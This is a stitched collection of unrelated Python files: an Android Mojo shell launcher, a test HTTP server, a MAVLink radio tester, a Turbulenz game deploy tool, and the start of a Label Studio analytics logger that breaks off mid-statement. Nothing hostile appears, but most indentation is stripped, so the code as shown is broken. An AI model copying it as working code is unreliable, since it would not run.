atexit.register(httpd.shutdown)
host_port = httpd.server_address[1]
http_thread = threading.Thread(target=httpd.serve_forever)
http_thread.daemon = True
http_thread.start()
device = android_commands.AndroidCommands(
android_commands.GetAttachedDevices()[0])
device.EnableAdbRoot()
device.ManagedInstall(os.path.join(build_dir, 'apks', 'MojoShell.apk'),
keep_data=True,
package_name=MOJO_SHELL_PACKAGE_NAME)
atexit.register(forwarder.Forwarder.UnmapAllDevicePorts, device)
forwarder.Forwarder.Map([(0, host_port)], device)
context = Context(device,
forwarder.Forwarder.DevicePortForHostPort(host_port))
atexit.register(StopShell, context)
return context
def StartShell(context, arguments, stdout=None, on_application_stop=None):
"""
Starts the mojo shell, passing it the given arguments.
If stdout is not None, it should be a valid argument for subprocess.Popen.
"""
STDOUT_PIPE = "/data/data/%s/stdout.fifo" % MOJO_SHELL_PACKAGE_NAME
cmd = [constants.GetAdbPath(),
'shell',
'am',
'start',
'-W',
'-S',
'-a', 'android.intent.action.VIEW',
'-n', '%s/.MojoShellActivity' % MOJO_SHELL_PACKAGE_NAME]
parameters = ['--origin=http://127.0.0.1:%d/' % context.device_port]
if stdout or on_application_stop:
context.device.RunShellCommand('rm %s' % STDOUT_PIPE)
parameters.append('--fifo-path=%s' % STDOUT_PIPE)
_ReadFifo(context, STDOUT_PIPE, stdout, on_application_stop)
parameters += arguments
if parameters:
encodedParameters = json.dumps(parameters)
cmd += [ '--es', 'encodedParameters', encodedParameters]
with open(os.devnull, 'w') as devnull:
subprocess.Popen(cmd, stdout=devnull).wait()
def StopShell(context):
"""
Stops the mojo shell.
"""
context.device.RunShellCommand('am force-stop %s' % MOJO_SHELL_PACKAGE_NAME)
def CleanLogs(context):
"""
Cleans the logs on the device.
"""
context.device.RunShellCommand('logcat -c')
def ShowLogs():
"""
Displays the log for the mojo shell.
Returns the process responsible for reading the logs.
"""
logcat = subprocess.Popen([constants.GetAdbPath(),
'logcat',
'-s',
' '.join(LOGCAT_TAGS)],
stdout=sys.stdout)
atexit.register(_ExitIfNeeded, logcat)
return logcat
def GetFilePath(filename):
"""
Returns a path suitable for the application to create a file.
"""
return '/data/data/%s/files/%s' % (MOJO_SHELL_PACKAGE_NAME, filename)
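# Illustrative usage sketch: a typical flow prepares a run context once, clears
# old logs, starts tailing logcat and then launches the shell. The `config`
# argument is assumed to be a mopy Config instance built by the caller, and
# 'mojo:sample_app' is only a placeholder application URL.
def _example_run(config):
    context = PrepareShellRun(config)
    CleanLogs(context)
    logcat = ShowLogs()
    StartShell(context, ['mojo:sample_app'], stdout=sys.stdout)
    return logcat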
|
test_server.py
|
import logging
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
logging.basicConfig(level=logging.NOTSET)
logger = logging.getLogger("test_web_server")
reply_payload = "default reply"
class RequestHandler(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
logger.info(
"GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)
)
self._set_response()
self.wfile.write(reply_payload.encode("utf-8"))
def do_POST(self):
pass
class TestServer:
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
def run(
self, reply, server_class=HTTPServer, handler_class=RequestHandler, port=8000
):
global reply_payload
reply_payload = reply
server_address = ("", port)
self.httpd = server_class(server_address, handler_class)
self.httpd.timeout = 2
logger.info("Starting httpd...\n")
def serve_forever(httpd):
with httpd:
httpd.serve_forever()
self.thread = Thread(target=serve_forever, args=(self.httpd,))
self.thread.setDaemon(True)
self.thread.start()
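# Illustrative usage sketch: start the server with a custom reply, fetch it over
# HTTP and shut the server down. The port and the use of urllib here are
# assumptions for demonstration only.
def _example_usage(port=8000):
    from urllib.request import urlopen
    server = TestServer()
    server.run("hello from the test server", port=port)
    try:
        body = urlopen("http://127.0.0.1:%d/" % port).read().decode("utf-8")
        assert body == "hello from the test server"
    finally:
        server.stop()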
if __name__ == "__main__":
from sys import argv
TestServer().run(argv[1] if len(argv) > 1 else reply_payload)
|
mavtester.py
|
#!/usr/bin/env python
'''
test MAVLink performance between two radios
'''
import sys, time, os, threading, Queue
from optparse import OptionParser
parser = OptionParser("mavtester.py [options]")
parser.add_option("--baudrate", type='int',
help="connection baud rate", default=57600)
parser.add_option("--port1", default=None, help="serial port 1")
parser.add_option("--port2", default=None, help="serial port 2")
parser.add_option("--rate", default=4, type='float', help="initial stream rate")
parser.add_option("--override-rate", default=1, type='float', help="RC_OVERRIDE rate")
parser.add_option("--show", action='store_true', default=False, help="show messages")
parser.add_option("--rtscts", action='store_true', default=False, help="enable RTSCTS hardware flow control")
parser.add_option("--mav20", action='store_true', default=False, help="enable MAVLink2")
parser.add_option("--key", default=None, help="MAVLink2 signing key")
parser.add_option("--swap", action='store_true', help="swap port1/port2")
(opts, args) = parser.parse_args()
if opts.mav20:
os.environ['MAVLINK20'] = '1'
from pymavlink import mavutil
if opts.port1 is None or opts.port2 is None:
print("You must specify two serial ports")
sys.exit(1)
# create GCS connection
if opts.swap:
port1 = opts.port2
port2 = opts.port1
else:
port1 = opts.port1
port2 = opts.port2
gcs = mavutil.mavlink_connection(port1, baud=opts.baudrate, input=True)
gcs.setup_logfile('gcs.tlog')
vehicle = mavutil.mavlink_connection(port2, baud=opts.baudrate, input=False)
vehicle.setup_logfile('vehicle.tlog')
print("Draining ports")
gcs.port.timeout = 1
vehicle.port.timeout = 1
while True:
r = gcs.port.read(1024)
if not r:
break
print("Drained %u bytes from gcs" % len(r))
time.sleep(0.01)
while True:
r = vehicle.port.read(1024)
if not r:
break
print("Drained %u bytes from vehicle" % len(r))
time.sleep(0.01)
if opts.rtscts:
print("Enabling RTSCTS")
gcs.set_rtscts(True)
vehicle.set_rtscts(True)
else:
gcs.set_rtscts(False)
vehicle.set_rtscts(False)
def allow_unsigned(mav, msgId):
'''see if an unsigned packet should be allowed'''
allow = {
mavutil.mavlink.MAVLINK_MSG_ID_RADIO : True,
mavutil.mavlink.MAVLINK_MSG_ID_RADIO_STATUS : True
}
if msgId in allow:
return True
return False
if opts.mav20 and opts.key is not None:
import hashlib
h = hashlib.new('sha256')
h.update(opts.key)
key = h.digest()
gcs.setup_signing(key, sign_outgoing=True, allow_unsigned_callback=allow_unsigned)
vehicle.setup_signing(key, sign_outgoing=True, allow_unsigned_callback=allow_unsigned)
# we use thread based receive to avoid problems with serial buffer overflow in the Linux kernel.
def receive_thread(mav, q):
'''continuously receive packets and put them in the queue'''
last_pkt = time.time()
while True:
m = mav.recv_match(blocking=False)
if m is not None:
q.put(m)
last_pkt = time.time()
# start receive threads for the GCS and vehicle connections
print("Starting threads")
gcs_queue = Queue.Queue()
gcs_thread = threading.Thread(target=receive_thread, args=(gcs, gcs_queue))
gcs_thread.daemon = True
gcs_thread.start()
vehicle_queue = Queue.Queue()
vehicle_thread = threading.Thread(target=receive_thread, args=(vehicle, vehicle_queue))
vehicle_thread.daemon = True
vehicle_thread.start()
start_time = time.time()
last_vehicle_send = time.time()
last_gcs_send = time.time()
last_override_send = time.time()
vehicle_lat = 0
gcs_lat = 0
def send_telemetry():
'''
send telemetry packets from the vehicle to
the GCS. This emulates the typical pattern of telemetry in
ArduPlane 2.75 in AUTO mode
'''
global last_vehicle_send, vehicle_lat
now = time.time()
# send at rate specified by user. This doesn't do rate adjustment yet (APM does adjustment
# based on RADIO packets)
if now - last_vehicle_send < 1.0/opts.rate:
return
last_vehicle_send = now
time_usec = int((now - start_time) * 1.0e6)
time_ms = time_usec // 1000
vehicle.mav.heartbeat_send(1, 3, 217, 10, 4, 3)
vehicle.mav.global_position_int_send(time_ms, vehicle_lat, 1491642131, 737900, 140830, 2008, -433, 224, 35616)
vehicle.mav.rc_channels_scaled_send(time_boot_ms=time_ms, port=0, chan1_scaled=280, chan2_scaled=3278, chan3_scaled=-3023, chan4_scaled=0, chan5_scaled=0, chan6_scaled=0, chan7_scaled=0, chan8_scaled=0, rssi=0)
if opts.mav20:
vehicle.mav.servo_output_raw_send(time_usec=time_usec, port=0, servo1_raw=1470, servo2_raw=1628, servo3_raw=1479, servo4_raw=1506, servo5_raw=1500, servo6_raw=1556, servo7_raw=1500, servo8_raw=1500,
servo9_raw=1500, servo10_raw=1500, servo11_raw=1500, servo12_raw=1500, servo13_raw=1500, servo14_raw=1500, servo15_raw=1500, servo16_raw=1500)
else:
vehicle.mav.servo_output_raw_send(time_usec=time_usec, port=0, servo1_raw=1470, servo2_raw=1628, servo3_raw=1479, servo4_raw=1506, servo5_raw=1500, servo6_raw=1556, servo7_raw=1500, servo8_raw=1500)
vehicle.mav.rc_channels_raw_send(time_boot_ms=time_ms, port=0, chan1_raw=1470, chan2_raw=1618, chan3_raw=1440, chan4_raw=1509, chan5_raw=1168, chan6_raw=1556, chan7_raw=1224, chan8_raw=994, rssi=0)
vehicle.mav.raw_imu_send(time_usec, 562, 382, -3917, -3330, 3445, 35, -24, 226, -523)
vehicle.mav.scaled_pressure_send(time_boot_ms=time_ms, press_abs=950.770019531, press_diff=-0.0989062488079, temperature=463)
vehicle.mav.sensor_offsets_send(mag_ofs_x=-68, mag_ofs_y=-143, mag_ofs_z=-34, mag_declination=0.206146687269, raw_press=95077, raw_temp=463, gyro_cal_x=-0.063114002347, gyro_cal_y=0.0479440018535, gyro_cal_z=0.0190890002996, accel_cal_x=0.418922990561, accel_cal_y=0.284875005484, accel_cal_z=-0.436598002911)
vehicle.mav.sys_status_send(onboard_control_sensors_present=64559, onboard_control_sensors_enabled=64559, onboard_control_sensors_health=64559, load=82, voltage_battery=11877, current_battery=0, battery_remaining=100, drop_rate_comm=0, errors_comm=0, errors_count1=0, errors_count2=0, errors_count3=0, errors_count4=0)
vehicle.mav.mission_current_send(seq=1)
vehicle.mav.gps_raw_int_send(time_usec=time_usec, fix_type=3, lat=-353637616, lon=1491642012, alt=737900, eph=169, epv=65535, vel=2055, cog=34782, satellites_visible=9)
vehicle.mav.nav_controller_output_send(nav_roll=0.0, nav_pitch=0.319999992847, nav_bearing=-18, target_bearing=343, wp_dist=383, alt_error=-37.0900001526, aspd_error=404.800537109, xtrack_error=1.52732038498)
vehicle.mav.attitude_send(time_boot_ms=time_ms, roll=0.00283912196755, pitch=-0.0538846850395, yaw=-0.0708072632551, rollspeed=0.226980209351, pitchspeed=-0.00743395090103, yawspeed=-0.154820173979)
vehicle.mav.vfr_hud_send(airspeed=21.9519939423, groundspeed=20.5499992371, heading=355, throttle=35, alt=737.900024414, climb=-0.784280121326)
vehicle.mav.ahrs_send(omegaIx=0.000540865410585, omegaIy=-0.00631708558649, omegaIz=0.00380697473884, accel_weight=0.0, renorm_val=0.0, error_rp=0.094664350152, error_yaw=0.0121578350663)
vehicle.mav.hwstatus_send(Vcc=0, I2Cerr=0)
vehicle.mav.wind_send(direction=27.729429245, speed=5.35723495483, speed_z=-1.92264056206)
vehicle_lat += 1
def send_GCS():
'''
send GCS heartbeat messages
'''
global last_gcs_send
now = time.time()
if now - last_gcs_send < 1.0:
return
gcs.mav.heartbeat_send(1, 6, 0, 0, 0, 0)
last_gcs_send = now
def send_override():
'''
send RC_CHANNELS_OVERRIDE messages from GCS
'''
global last_override_send
now = time.time()
if opts.override_rate == 0:
return
if now - last_override_send < 1.0/opts.override_rate:
return
time_ms = int((now - start_time) * 1.0e3)
time_ms_low = time_ms % 65536
time_ms_high = (time_ms - time_ms_low) // 65536
gcs.mav.rc_channels_override_send(1, 2, time_ms_low, time_ms_high, 0, 0, 0, 0, 0, 0)
last_override_send = now
def process_override(m):
'''
process an incoming RC_CHANNELS_OVERRIDE message, measuring latency
'''
now = time.time()
time_ms_sent = m.chan2_raw*65536 + m.chan1_raw
time_ms = int((now - start_time) * 1.0e3)
latency = time_ms - time_ms_sent
stats.latency_count += 1
stats.latency_total += latency
if stats.latency_min == 0 or latency < stats.latency_min:
stats.latency_min = latency
if latency > stats.latency_max:
stats.latency_max = latency
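# Illustrative sketch: send_override() packs a millisecond timestamp into two
# 16-bit RC channel values and process_override() reassembles it to measure
# link latency. The same split/reassembly in isolation (values are examples):
def _pack_unpack_example(time_ms=123456789):
    low = time_ms % 65536            # carried in chan1_raw
    high = (time_ms - low) // 65536  # carried in chan2_raw
    assert high * 65536 + low == time_ms
    return low, high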
def recv_vehicle():
'''
receive packets in the vehicle
'''
try:
m = vehicle_queue.get(block=False)
except Queue.Empty:
return False
if m.get_type() == 'BAD_DATA':
stats.vehicle_bad_data += 1
return True
if opts.show:
print(m)
stats.vehicle_received += 1
if m.get_type() in ['RADIO','RADIO_STATUS']:
#print('VRADIO: ', str(m))
stats.vehicle_radio_received += 1
stats.vehicle_txbuf = m.txbuf
stats.vehicle_fixed = m.fixed
stats.vehicle_rssi = m.rssi
stats.vehicle_noise = m.noise
if m.get_type() == 'RC_CHANNELS_OVERRIDE':
process_override(m)
return True
def recv_GCS():
'''
receive packets in the GCS
'''
try:
m = gcs_queue.get(block=False)
except Queue.Empty:
return False
if m.get_type() == 'BAD_DATA':
stats.gcs_bad_data += 1
return True
if m.get_type() == 'GLOBAL_POSITION_INT':
global gcs_lat
if gcs_lat != m.lat:
print("Lost %u GLOBAL_POSITION_INT messages" % (m.lat - gcs_lat))
gcs_lat = m.lat
gcs_lat += 1
if opts.show:
print(m)
stats.gcs_received += 1
if m.get_type() in ['RADIO','RADIO_STATUS']:
#print('GRADIO: ', str(m))
stats.gcs_radio_received += 1
stats.gcs_txbuf = m.txbuf
stats.gcs_fixed = m.fixed
stats.gcs_rssi = m.rssi
stats.gcs_noise = m.noise
return True
class PacketStats(object):
'''
class to hold statistics on the link
'''
def __init__(self):
self.gcs_sent = 0
self.vehicle_sent = 0
self.gcs_received = 0
self.vehicle_received = 0
self.gcs_radio_received = 0
self.vehicle_radio_received = 0
self.gcs_last_bytes_sent = 0
self.vehicle_last_bytes_sent = 0
self.latency_count = 0
self.latency_total = 0
self.latency_min = 0
self.latency_max = 0
self.vehicle_bad_data = 0
self.gcs_bad_data = 0
self.last_gcs_radio = None
self.last_vehicle_radio = None
self.vehicle_txbuf = 100
self.gcs_txbuf = 100
self.vehicle_rssi = 0
self.gcs_rssi = 0
self.vehicle_noise = 0
self.gcs_noise = 0
self.vehicle_fixed = 0
self.gcs_fixed = 0
def __str__(self):
gcs_bytes_sent = gcs.mav.total_bytes_sent - self.gcs_last_bytes_sent
vehicle_bytes_sent = vehicle.mav.total_bytes_sent - self.vehicle_last_bytes_sent
self.gcs_last_bytes_sent = gcs.mav.total_bytes_sent
self.vehicle_last_bytes_sent = vehicle.mav.total_bytes_sent
avg_latency = 0
if stats.latency_count != 0:
avg_latency = stats.latency_total / stats.latency_count
return "Veh:%u/%u/%u GCS:%u/%u/%u pend:%u rates:%u/%u lat:%u/%u/%u bad:%u/%u txbuf:%u/%u rssi:%u/%u noise:%u/%u loss:%u:%u%%/%u:%u%% fixed:%u/%u" % (
self.vehicle_sent,
self.vehicle_received,
self.vehicle_received - self.vehicle_radio_received,
self.gcs_sent,
self.gcs_received,
self.gcs_received - self.gcs_radio_received,
self.vehicle_sent - (self.gcs_received - self.gcs_radio_received),
gcs_bytes_sent,
vehicle_bytes_sent,
stats.latency_min,
stats.latency_max,
avg_latency,
self.vehicle_bad_data,
self.gcs_bad_data,
self.vehicle_txbuf,
self.gcs_txbuf,
self.vehicle_rssi,
self.gcs_rssi,
self.vehicle_noise,
self.gcs_noise,
gcs.mav_loss,
gcs.packet_loss(),
vehicle.mav_loss,
vehicle.packet_loss(),
stats.vehicle_fixed,
stats.gcs_fixed)
'''
main code
'''
last_report = time.time()
stats = PacketStats()
while True:
send_telemetry()
stats.vehicle_sent = vehicle.mav.total_packets_sent
send_GCS()
send_override()
stats.gcs_sent = gcs.mav.total_packets_sent
while True:
recv1 = recv_vehicle()
recv2 = recv_GCS()
if not recv1 and not recv2:
break
if time.time() - last_report >= 1.0:
print(stats)
last_report = time.time()
|
deploygame.py
|
#!/usr/bin/env python
# Copyright (c) 2011-2014 Turbulenz Limited
import logging
import locale
import mimetypes
from os.path import exists as path_exists, dirname as path_dirname, basename as path_basename, abspath as path_abspath
from optparse import OptionParser, TitledHelpFormatter
from urllib3 import connection_from_url
from urllib3.exceptions import HTTPError, SSLError
from simplejson import loads as json_loads
from threading import Thread
from time import sleep, time
from re import compile as re_compile
from sys import stdin, stdout
from getpass import getpass, GetPassWarning
from math import modf
from turbulenz_local.models.game import Game, GameError
from turbulenz_local.lib.deploy import Deployment
__version__ = '1.0.3'
HUB_COOKIE_NAME = 'hub'
HUB_URL = 'https://hub.turbulenz.com/'
# pylint: disable=C0301
USERNAME_PATTERN = re_compile('^[a-z0-9]+[a-z0-9-]*$') # usernames
PROJECT_SLUG_PATTERN = re_compile('^[a-zA-Z0-9\-]*$') # game and versions
PROJECT_VERSION_PATTERN = re_compile('^[a-zA-Z0-9\-\.]*$') # game and versions
# pylint: enable=C0301
def log(message, new_line=True):
message = message.encode(stdout.encoding or 'UTF-8', 'ignore')
print ' >> %s' % message,
if new_line:
print
def error(message):
log('[ERROR] - %s' % message)
def warning(message):
log('[WARNING] - %s' % message)
def _add_missing_mime_types():
mimetypes.add_type('application/vnd.turbulenz', '.tzjs')
mimetypes.add_type('application/json', '.json')
mimetypes.add_type('image/dds', '.dds')
mimetypes.add_type('image/tga', '.tga')
mimetypes.add_type('image/ktx', '.ktx')
mimetypes.add_type('image/x-icon', '.ico')
mimetypes.add_type('text/cgfx', '.cgfx')
mimetypes.add_type('application/javascript', '.js')
mimetypes.add_type('application/ogg', '.ogg')
mimetypes.add_type('image/png', '.png')
mimetypes.add_type('text/x-yaml', '.yaml')
mimetypes.add_type('image/svg+xml', '.svg')
mimetypes.add_type('image/pjpeg', '.jpg')
mimetypes.add_type('video/webm', '.webm')
mimetypes.add_type('video/mp4', '.mp4')
mimetypes.add_type('video/mp4', '.m4v')
mimetypes.add_type('audio/aac', '.aac')
mimetypes.add_type('audio/mpeg', '.mp3')
mimetypes.add_type('audio/mp4', '.m4a')
mimetypes.add_type('application/tar', '.tar')
mimetypes.add_type('text/css', '.css')
def _create_parser():
parser = OptionParser(description='Deploy game from Local to the Hub',
formatter=TitledHelpFormatter())
parser.add_option("--version", action="store_true", dest="output_version", default=False,
help="output version number")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False, help="verbose output")
parser.add_option("-s", "--silent", action="store_true", dest="silent", default=False, help="silent running")
parser.add_option("-i", "--input", action="store", dest="input", help="manifest file for the game to be deployed")
parser.add_option("-u", "--user", action="store", dest="user", help="login username")
parser.add_option("-p", "--password", action="store", dest="password",
help="login password (will be requested if not provided)")
parser.add_option("--project", action="store", dest="project", help="project to deploy to")
parser.add_option("--projectversion", action="store", dest="projectversion", help="project version to deploy to")
parser.add_option("--projectversiontitle", action="store", dest="projectversiontitle",
help="project version title, for existing project versions this will overwrite the existing " \
"title if supplied. For new versions this defaults to the project version")
parser.add_option("-c", "--cache", action="store", dest="cache", help="folder to be used for caching")
parser.add_option("--hub", action="store", dest="hub", default=HUB_URL,
help="Hub url (defaults to https://hub.turbulenz.com/)")
parser.add_option("--ultra", action="store_true", dest="ultra", default=False,
help="use maximum compression. Will take MUCH longer. May reduce file size by an extra 10%-20%.")
return parser
def _check_options():
parser = _create_parser()
(options, _args) = parser.parse_args()
if options.output_version:
print __version__
exit(0)
if options.silent:
logging.basicConfig(level=logging.CRITICAL)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.WARNING)
manifest_file = options.input
if not manifest_file:
error('No manifest file specified!')
#parser.print_help()
exit(-1)
if not path_exists(manifest_file):
error('Expecting an existing manifest file, "%s" does not exist!' % manifest_file)
#parser.print_help()
exit(-1)
cache_folder = options.cache
if not cache_folder:
error('Expecting a cache folder!')
parser.print_help()
exit(-1)
if not path_exists(cache_folder):
error('Expecting an existing cache folder, "%s" does not exist!' % cache_folder)
exit(-1)
username = options.user
if not username:
error('Login information required!')
parser.print_help()
exit(-1)
if not options.password:
try:
options.password = getpass()
except GetPassWarning:
error('Echo free password entry unsupported. Please provide a --password argument')
parser.print_help()
return -1
if not USERNAME_PATTERN.match(username):
error('Incorrect "username" format!')
exit(-1)
project = options.project
if not project:
error('Hub project required!')
parser.print_help()
exit(-1)
if not PROJECT_SLUG_PATTERN.match(project):
error('Incorrect "project" format!')
exit(-1)
projectversion = options.projectversion
if not projectversion:
error('Hub project version required!')
parser.print_help()
exit(-1)
if not PROJECT_VERSION_PATTERN.match(projectversion):
error('Incorrect "projectversion" format!')
exit(-1)
if options.projectversiontitle is not None:
options.projectversiontitle = options.projectversiontitle.decode('UTF-8')
if len(options.projectversiontitle) > 48:
error('"projectversiontitle" too long (max length 48 characters)!')
exit(-1)
if options.hub is None:
options.hub = 'http://127.0.0.1:8080'
return options
def login(connection, options):
username = options.user
password = options.password
if not options.silent:
log('Login as "%s".' % username)
credentials = {'login': username,
'password': password,
'source': '/tool'}
try:
r = connection.request('POST',
'/dynamic/login',
fields=credentials,
retries=1,
redirect=False)
except (HTTPError, SSLError):
error('Connection to Hub failed!')
exit(-1)
if r.status != 200:
if r.status == 301:
redirect_location = r.headers.get('location', '')
end_domain = redirect_location.find('/dynamic/login')
error('Login is being redirected to "%s". Please verify the Hub URL.' % redirect_location[:end_domain])
else:
error('Wrong user login information!')
exit(-1)
cookie = r.headers.get('set-cookie', None)
login_info = json_loads(r.data)
# pylint: disable=E1103
if not cookie or HUB_COOKIE_NAME not in cookie or login_info.get('source') != credentials['source']:
error('Hub login failed!')
exit(-1)
# pylint: enable=E1103
return cookie
def logout(connection, cookie):
try:
connection.request('POST',
'/dynamic/logout',
headers={'Cookie': cookie},
redirect=False)
except (HTTPError, SSLError) as e:
error(str(e))
def _check_project(connection, options, cookie):
project = options.project
projectversion = options.projectversion
projectversion_title = options.projectversiontitle
try:
r = connection.request('POST',
'/dynamic/upload/projects',
headers={'Cookie': cookie},
redirect=False)
except (HTTPError, SSLError) as e:
error(e)
exit(-1)
if r.status != 200:
error('Wrong Hub answer!')
exit(-1)
# pylint: disable=E1103
projects = json_loads(r.data).get('projects', [])
# pylint: enable=E1103
upload_access = False
new_version = True
for project_info in projects:
if project_info['slug'] == project:
upload_access = True
for version_info in project_info['versions']:
if version_info['version'] == projectversion:
new_version = False
# Use the supplied project version title or the existing one as a fallback
existingversion_title = version_info['title']
projectversion_title = projectversion_title or existingversion_title
break
# If projectversion_title is still unset this is a new version with no supplied title, default to the version
projectversion_title = projectversion_title or projectversion
if not upload_access:
error('Project "%s" does not exist or you are not authorized to upload new versions!' % project)
exit(-1)
if not options.silent:
if new_version:
log('Uploading to new version "%s" on project "%s".' % (projectversion, project))
else:
log('Uploading to existing version "%s" on project "%s".' % (projectversion, project))
if projectversion_title != existingversion_title:
log('Changing project version title from "%s" to "%s".' % (existingversion_title,
projectversion_title))
return (project, projectversion, projectversion_title)
def _get_cookie_value(cookie):
for cookie_pair in cookie.split(';'):
if HUB_COOKIE_NAME in cookie_pair:
return cookie_pair
error('Wrong cookie: %s' % cookie)
exit(-1)
def _fmt_value(value):
return locale.format('%lu', value, grouping=True)
def _fmt_time(seconds):
hours = 0
minutes = 0
milliseconds, seconds = modf(seconds)
milliseconds = int(milliseconds * 1000)
if seconds > 3600:
hours = int(seconds / 3600)
seconds -= (hours * 3600)
if seconds > 60:
minutes = int(seconds / 60)
seconds -= (minutes * 60)
return '%02d:%02d:%02d.%03d' % (hours, minutes, seconds, milliseconds)
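# Worked example (illustrative only): 3725.5 seconds is 1 hour, 2 minutes,
# 5 seconds and 500 milliseconds.
def _fmt_time_example():
    assert _fmt_time(3725.5) == '01:02:05.500'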
def _check_game(game):
def log_issues(issues):
for key, items in issues.iteritems():
log('Issues in %s:' % key)
for item in items:
log('- %s:' % item[0])
for value in item[1].get('errors', []):
error(value)
for value in item[1].get('warnings', []):
warning(value)
complete, issues = game.check_completeness()
if not complete:
log_issues(issues)
exit(-1)
issues, critical = game.validate_yaml()
if issues:
log_issues(issues)
if critical:
exit(-1)
log('If you still want to deploy, the missing values will be replaced by default ones.')
log('Deploy? (Y/N) ', False)
if stdin.readline().strip()[0] not in 'yY':
exit(-1)
def _progress(deploy_info, silent, verbose):
if silent:
sleep_step = 1.0
elif verbose:
log('Scanning and compressing:')
sleep_step = 0.2
else:
log('Scanning and compressing files...')
sleep_step = 0.4
old_num_bytes = 0
old_uploaded_bytes = 0
while True:
sleep(sleep_step)
if deploy_info.error:
error(deploy_info.error)
return -1
if not silent:
current_num_bytes = deploy_info.num_bytes
current_uploaded_bytes = deploy_info.uploaded_bytes
if old_num_bytes != current_num_bytes or old_uploaded_bytes != current_uploaded_bytes:
if verbose:
total_files = deploy_info.total_files
if current_uploaded_bytes == 0:
log(' %u/%u (%s bytes)' % (deploy_info.num_files,
total_files,
_fmt_value(current_num_bytes)))
else:
if old_uploaded_bytes == 0:
if old_num_bytes < current_num_bytes:
log(' %u/%u (%s bytes)' % (deploy_info.num_files,
total_files,
_fmt_value(current_num_bytes)))
log('Uploading modified files:')
log(' %u/%u (%s/%s)' % (deploy_info.uploaded_files,
deploy_info.num_files,
_fmt_value(current_uploaded_bytes),
_fmt_value(current_num_bytes)))
else:
if current_uploaded_bytes != 0 and old_uploaded_bytes == 0:
log('Uploading modified files...')
if deploy_info.num_files > 1000:
sleep_step = 1.0
old_num_bytes = current_num_bytes
old_uploaded_bytes = current_uploaded_bytes
if deploy_info.done:
if not silent:
if verbose:
log('Done uploading.')
else:
log('Done uploading: %u files (%s bytes)' % (deploy_info.num_files,
_fmt_value(current_num_bytes)))
break
return 0
def _postupload_progress(deploy_info, connection, cookie, silent, verbose):
if silent:
sleep_step = 1.0
elif verbose:
log('Post processing:')
sleep_step = 0.2
else:
log('Post processing files...')
sleep_step = 0.4
if not deploy_info.hub_session:
error('No deploy session found.')
return -1
old_progress = 0
while True:
sleep(sleep_step)
if deploy_info.error:
error(deploy_info.error)
return -1
try:
r = connection.request('POST',
'/dynamic/upload/progress/%s' % deploy_info.hub_session,
headers={'Cookie': cookie},
redirect=False)
except (HTTPError, SSLError) as e:
error(e)
error('Post-upload progress check failed.')
return -1
if r.status != 200:
error('Wrong Hub answer.')
return -1
r_data = json_loads(r.data)
# pylint: disable=E1103
current_progress = int(r_data.get('progress', -1))
error_msg = str(r_data.get('error', ''))
# pylint: enable=E1103
if error_msg:
error('Post-upload processing failed: %s' % error_msg)
return -1
if -1 == current_progress:
error('Invalid post-upload progress.')
return -1
if verbose and not silent:
if old_progress != current_progress:
log('Progress: %u%%' % current_progress)
old_progress = current_progress
if 100 <= current_progress:
if not silent:
log('Post processing completed.')
return 0
def main():
# pylint: disable=E1103
options = _check_options()
locale.setlocale(locale.LC_ALL, '')
verbose = options.verbose
if verbose:
logging.disable(logging.INFO)
else:
logging.disable(logging.WARNING)
_add_missing_mime_types()
try:
game = Game(game_list=None,
game_path=path_abspath(path_dirname(options.input)),
slug=None,
games_root=options.cache,
deploy_enable=True,
manifest_name=path_basename(options.input))
_check_game(game)
silent = options.silent
if not silent:
log('Deploying "%s" to "%s".' % (game.slug, options.hub))
connection = connection_from_url(options.hub, maxsize=8, timeout=8.0)
cookie = login(connection, options)
(project, projectversion, projectversion_title) = _check_project(connection, options, cookie)
result = 0
deploy_info = None
deploy_thread = None
try:
deploy_info = Deployment(game,
connection,
project,
projectversion,
projectversion_title,
_get_cookie_value(cookie),
options.cache)
deploy_thread = Thread(target=deploy_info.deploy, args=[options.ultra])
deploy_thread.start()
start_time = time()
result = _progress(deploy_info, silent, verbose)
if 0 == result:
result = _postupload_progress(deploy_info, connection, cookie, silent, verbose)
if 0 == result:
if not silent:
log('Deployment time: %s' % _fmt_time((time() - start_time)))
game.set_deployed()
except KeyboardInterrupt:
warning('Program stopped by user!')
if deploy_info:
deploy_info.cancel()
result = -1
except Exception as e:
error(str(e))
if deploy_info:
deploy_info.cancel()
result = -1
if deploy_info:
del deploy_info
if deploy_thread:
del deploy_thread
logout(connection, cookie)
return result
except GameError:
return -1
#except Exception as e:
# error(str(e))
# return -1
if __name__ == "__main__":
exit(main())
|
contextlog.py
|
"""This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import logging
import os
import sys
import io
import requests
import calendar
import threading
import json
import platform
from datetime import datetime
from django.conf import settings
from uuid import uuid4
from .common import get_app_version, get_bool_env, get_client_ip
from .io import get_config_dir
logger = logging.getLogger(__name__)
class ContextLog(object):
def __init__(self):
self.collect_analytics = get_bool_env('collect_analytics', True)
self.version = get_app_version()
self.server_id = self._get_server_id()
def _get_label_studio_env(self):
env = {}
for env_key, env_value in os.environ.items():
if env_key.startswith('LABEL_STUDIO_'):
env[env_key] = env_value
return env
def _get_server_id(self):
user_id_file = os.path.join(get_config_dir(), 'user_id')
if not os.path.exists(user_id_file):
user_id = str(uuid4())
with io.open(user_id_file, mode='w', encoding='utf-8') as fout:
fout.write(user_id)
else:
with io.open(user_id_file, encoding='utf-8') as f:
user_id = f.read()
return user_id
def _is_docker(self):
path = '/proc/self/cgroup'
return (
os.path.exists('/.dockerenv') or
os.path.isfile(path) and any('docker' in line for line in open(path, encoding='utf-8'))
)
def _get_timestamp_now(self):
return calendar.timegm(datetime.now().utctimetuple())
def _prepare_json(self, payload, request):
j = payload['json']
view_name = payload['view_name']
if view_name in ('tasks:api:task-annotations', 'tasks:api-annotations:annotation-detail'):
types = [r.get('type') for r in j.get('result', [])]
payload['json'] = {'result': types, 'lead_time': j.get('lead_time')}
def _get_response_content(self, response):
try:
return json.loads(response.content)
except:
return
def _prepare_response(self, payload):
view_name = payload['view_name']
if view_name in (
'data_export:api-projects:project-export',
'data_manager:api:view-tasks',
'data_manager:data_manager.api.ProjectActionsAPI',
